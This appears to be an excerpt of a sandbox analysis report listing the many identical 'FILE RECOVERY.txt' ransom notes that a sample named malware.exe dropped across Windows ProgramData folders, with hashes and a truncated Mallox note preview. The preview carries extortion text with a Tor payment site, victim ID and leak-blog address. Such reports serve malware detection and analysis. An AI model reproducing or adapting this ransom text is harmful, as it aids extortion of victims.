                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\SoftLanding\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\Temp\DiagTrackTraceSlot_alternativeTrace\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\Temp\DiagTrackTraceSlot_aot\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\Temp\DiagTrackTraceSlot_diag\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\Temp\DiagTrackTraceSlot_miniTrace\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\TenantStorage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\TimeTravelDebuggingStorage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\DiagnosticLogCSP\Channels\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\DiagnosticLogCSP\DeviceStateData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\DiagnosticLogCSP\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\EdgeUpdate\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\EdgeUpdate\Log\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\IdentityCRL\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\IdentityCRL\INT\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\IdentityCRL\production\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
